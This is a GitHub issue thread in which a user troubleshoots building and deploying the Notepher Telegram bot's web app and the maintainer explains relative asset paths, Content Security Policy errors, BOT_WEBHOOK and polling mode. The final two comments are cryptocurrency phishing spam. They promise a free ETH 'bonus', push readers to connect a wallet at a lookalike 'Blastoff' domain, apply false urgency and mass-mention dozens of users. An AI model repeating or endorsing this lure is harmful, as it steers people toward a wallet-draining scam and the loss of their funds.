### ISSUE TITLE
SyntaxError: Unexpected reserved word

### ISSUE THREAD

**Issue by akukalev** [deptyped/notepher-bot#36]
Hello! I really loved your app. I would like to add it to an existing Telegram chat to improve interactions between the members of a small team. So, I tried to follow your instructions, but I got a Syntax error while building the web app:

path/bla/bla/notepher-bot/web-app/node_modules/vite/bin/vite.js:7
    await import('source-map-support').then((r) => r.default.install())
    ^^^^^

SyntaxError: Unexpected reserved word

Unfortunately, I do not have much skills with npm and java, I use python and would not be able to solve it. Can you please have a look? Thanks a lot!

**Comment by deptyped** [comment]
Hello. Can you please describe exact steps to reproduce the problem?

**Comment by akukalev** [comment]
> Hello. Can you please describe exact steps to reproduce the problem?

Hi! Thanks for the reply. Well, I did exactly what you suggest:
a) git clone https://github.com/deptyped/notepher-bot.git
b) cd web-app
c) npm run build

And I got the error message shown above. I had to install npm first. OS Ubuntu 22.04 LTS.

**Comment by deptyped** [comment]
> I placed the contest of dist folder to the hosting provider web site and have set the menu button via @Botfather as you described.

At this point, bot should have a button to launch the app, like the "Notes" button in [@NotepherBot](https://t.me/NotepherBot)

> What shall I do with .env file after I specified BOT_TOKEN and WEB_APP_URL? Where should I launch the bot?

On any NodeJS hosting you choose, it can be [a serverless platform or your VPS server](https://grammy.dev/hosting/comparison). Just upload the files and run `npm start`.
Note that this step is optional, the web app is fully functional without this step. This application is needed to make a bot respond to commands such as `/start`. If the "Notes" button is enough for you, just skip these steps

**Comment by akukalev** [comment]
> At this point, bot should have a button to launch the app, like the "Notes" button in [@NotepherBot](https://t.me/NotepherBot)

Yes, this worked just fine. But it opens an empty page and I can't create any new notes there.

> On any NodeJS hosting you choose, it can be [a serverless platform or your VPS server](https://grammy.dev/hosting/comparison). Just upload the files and run `npm start`.

O, I see!.. the files from dist folder I uploaded to a normal hosting, just created a new folder on a web-site, where I have a wordpress installation. I will read more about VPS servers and check your link! Thank you and sorry for the naive questions. App building is not my cup of tea, unfortunately.

**Comment by deptyped** [comment]
> ...the files from dist folder I uploaded to a normal hosting, just created a new folder on a web-site, where I have a wordpress installation

1. Make sure there is an `index.html` file in this folder. And other files from the list below:

![image](https://github.com/deptyped/notepher-bot/assets/26162440/331be4bc-dba7-4cba-ba48-a76150c92e69)

2. Make sure you specify the correct link for the menu button. Try opening the link in your browser and check the source code, it should look like this:

![image](https://github.com/deptyped/notepher-bot/assets/26162440/7e9e8f9c-bc2c-4d7f-a883-a3736eaab756)

**Comment by akukalev** [comment]
Well... yes. The ending of file names are different, but overall the structure is identical.
assets/index-5df35b37.css
assets/index-d4b9f7a8.js
assets/workbox-window.prod.es5-a7b12eab.js
index.html
sw.js
workbox-7cfec069.js|
manifest.webmanifest

The code of the index.html also looks like yours:

```
<html>
<body>
<!--StartFragment-->
  | <!DOCTYPE html>
-- | --
  | <html lang="en">
  |  
  | <head>
  | 
  | <link rel="icon" href="/favicon.ico">
  | <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0" />
  |  
  | <title>Notepher Mini App</title>
  | <script type="module" crossorigin src="/assets/index-d4b9f7a8.js"></script>
  | <link rel="stylesheet" href="/assets/index-5df35b37.css">
  | <link rel="manifest" href="/manifest.webmanifest"></head>
  |  
  | <body>
  | <div id="app"></div>
  | <script src="https://telegram.org/js/telegram-web-app.js"></script>
  |  
  | </body>
  |  
  | </html>

<!--EndFragment-->
</body>
</html>

```
However, when I click on the page is empty and If I added the bot to an existing chat then nothing happens. I repeated all steps one more time, creating another bot with BotFather and copy-pasted the link to the index.html, but it's the same outcome

**Comment by deptyped** [comment]
Hmm.. let me guess. Perhaps it is because of absolute paths, make [this change](https://github.com/deptyped/notepher-bot/commit/b2fe5444cd751270116d1ada23a52ed3d46ce672) to make paths relative and rebuild the web app

**Comment by akukalev** [comment]
Thanks for the help... but nothing changed! :(( I updated web-app/vite.config.ts, rebuild the app, copied the new files over ftp to the server.... the same. 
I can do git clone again and then rebuild the app. Just in case it helps...

**Comment by deptyped** [comment]
You can try to open the web app in https://web.telegram.org to see exactly what error occurs using browser devtools.

**Comment by akukalev** [comment]
Good idea! So, what it says is the following:

> "Some resources are blocked because their origin is not listed in your site's Content Security Policy (CSP). Your site's CSP is allowlist-based, so resources must be listed in the allowlist in order to be accessed."

And below:

> Resource | Status | Directive | Source Location
> data | blocked | connect-src | InfiniteScroll.tsx:136

Also it says 

> "This page failed to load a stylesheet from a URL."

In other words it seems to be related to the settings of WordPress.  It seems that I need to google a bit more about it :))

**Comment by akukalev** [comment]
Sadly, but I will probably give up... it seems to be too complex and I do know why things are not working. Briefly, I created Amazon AWS instance to host the app and all steps of your manual worked fine (the only thing that was not clear to me is the following: what is BOT_WEBHOOK? Is it the same address as WEB_APP_URL? Is it something else?). However, most importantly I tried to deploy the output resources to 3 different web-sites  (always updating /setmenubutton command) and it never worked for me. I just get white empty page all the time... so regardless of sucessfully running the app on Amazon AWS it does not seem to work at a more basic level for some weird reason :(

**Comment by deptyped** [comment]
> I deployed the output resources to 3 different web-sites

Have they always been placed in a subfolder?

**Comment by akukalev** [comment]
> Have they always been placed in a subfolder?

Yes, but I also changed all paths in the index.html file from "/assets/" to "/notepher/assets/". Would it not be enough?

I believe this is about that CSP policy. I also registered yesterday for a free hosting at Infinityfree.com and will try to place the app resources there once DNS servers will get updated. My assumption is that free resource might have different policies than paid web-hosting.

**Comment by akukalev** [comment]
I have one more question, if you don't mind. Could you please clarify and provide an example of what I have to specify for BOT_WEBHOOK?

**Comment by akukalev** [comment]
Wow! Ok, I do not know what exactly changed, but CSP errors are gone... I also created and added favicon.ico to the web-site. Browser devtools does not show any error anymore, just one suggestion "A form field element has neither an id nor a name attribute" - however it still gives empty white page :(((

**Comment by akukalev** [comment]
I found some information about  CSP here https://stackoverflow.com/questions/65930851/how-to-use-telegram-authorization-in-angular-app 

> The Content-Security-Policy of the Telegram widget only allows a limited list of hosts to include it as an iframe.
> To add your domain to the allow-list you have to link the bot to your domain
> Once you have chosen a bot, send the /setdomain command to @Botfather to link your website's domain to the bot.

I did exactly that, CSP error is now gone and the browser devtools do not show any error. However, the Notes button still does not load anything except an empty page :(((

**Comment by deptyped** [comment]
> Could you please clarify and provide an example of what I have to specify for BOT_WEBHOOK?

`BOT_WEBHOOK` is used as the `url` parameter when calling [setWebhook](https://core.telegram.org/bots/api#setwebhook) when launching a bot in webhook mode.

You must specify a URL pointing to running web server + bot token as the path. For example, if web server is running at https://example.org, you must specify `https://example.org/YOUR_BOT_TOKEN` in `BOT_WEBHOOK`. 

Webhook can be quite tricky to setup, another option is to use polling mode (which doesn't require a web server, https and other stuff) with [@grammyjs/runner](https://grammy.dev/plugins/runner) plugin which makes polling mode suitable for production. I've prepared a branch with an example for you:
https://github.com/deptyped/notepher-bot/compare/36-runner-example

Just set `BOT_MODE` to `runner` and it should work fine, you don't need to set `BOT_WEBHOOK` anymore.

**Comment by deptyped** [comment]
> ...it's not clear to me how telegram knows about where the bot is running. You said "This application is needed to make a bot respond to commands such as /start", but the only information I give to telegram is about web server https.

Yes, Telegram sends bot updates to web server address you specify (in `BOT_WEBHOOK`). In general, the process looks like this:

![image](https://github.com/deptyped/notepher-bot/assets/26162440/6a4b68eb-5c28-49f3-a018-c920c72bbca4)

> The application can get the information from the web-server due to .env variables. How does the telegram chat or the web-server get the information from the app?

What information do you mean? I'm not sure I understand your question

Just to clarify, the web application (located in `web-app/`) does not communicate in any way with the application located in the root, which runs the web server and handles updates from Telegram (such as the `/start` command).

**Comment by akukalev** [comment]
> Just to clarify, the web application (located in `web-app/`) does not communicate in any way with the application located in the root, which runs the web server and handles updates from Telegram (such as the `/start` command).

Sorry, this is exactly what I find confusing because in step 4 you wrote "Set the WEB_APP_URL environment variable with the URL obtained during the web app deployment (step 2)", but then you say that web-app does not communicate in any way with the application.

**Comment by akukalev** [comment]
Hi, it's me again! I tried many options to create a fully functional bot and they all failed with different kind of errors... however I kind of like Netlify platform. If one day you will get bored and decided to be-friend you fantastic app with Netlify... Just let me know :) A short manual explaning the settings for deployment will be amazing. 
Of course, I also understand if this will never happen! Thanks a lot for your time!

**Comment by gamberoillecito** [comment]
@akukalev check out my [last issue](https://github.com/deptyped/notepher-bot/issues/40#issuecomment-1958845275), maybe it could help you

**Comment by ghost** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
awave1, @Hooman47, @insurshawn, @javedbaloch4, @ccozkan, @adityasaxena, @jackyoung022, @yubozhao, @PepeAnguita, @bachtran, @fortune1dev, @aciura, @williammoraes, @Pethum55, @felipe-main, @devendran-m, @Avantgarde95, @slmarcos, @plainfatboy, @aikin-vip, @nec286, @maooson, @appfromape, @Nurdan96, @psurma, @KhaledBuilds, @124t, @OxfordStreet, @bwhour, @Jusharra, @jbrzozowski, @mschwers, @ZahoorKhan47, @neuralbayes, @masud99r, @codenamejason, @RainGather, @enpitsuLin, @zhengyu9955, @Daniel-Grounin, @adrozdenko, @Humaather, @EricSKCheng, @dtobi59, @Franceshe, @bartzalewski, @ASchmidt1024, @glaksmono, @lee1221ee, @xyoojxiong

**Comment by steamyrails** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
Johannesduvenage, @Averyjd12, @Sechmail, @Sameerkash, @Pomelog, @dropkick44, @AlphaPerfect, @pbadeer, @ZenSwordman, @diegodelmondes, @natashacai, @Sutsikii, @Abdayya, @nickleefly, @zh4n7wm, @tekon92, @mvacher, @demining, @Zetaquant, @Bobbaiii, @m0m3nt0, @bigwhitechen, @ABHISHEK-G0YAL, @rafalkrupinski, @shinyakuhi, @AlexFrax, @FerhatKaracaa, @cchao918, @fridzema, @fnfgamedev, @wtc0der, @nafeef123, @c-vision, @viniaero, @Maz0lka, @Haruqun, @ColorFuzzy, @Anti51, @cssaheel, @nklv, @wlsoft2006, @anilwhite, @0xPraniis, @nilocky, @almbergermartin, @nikepan, @dyumin, @roddesiqueira, @harvestsure, @ZuluSpl0it
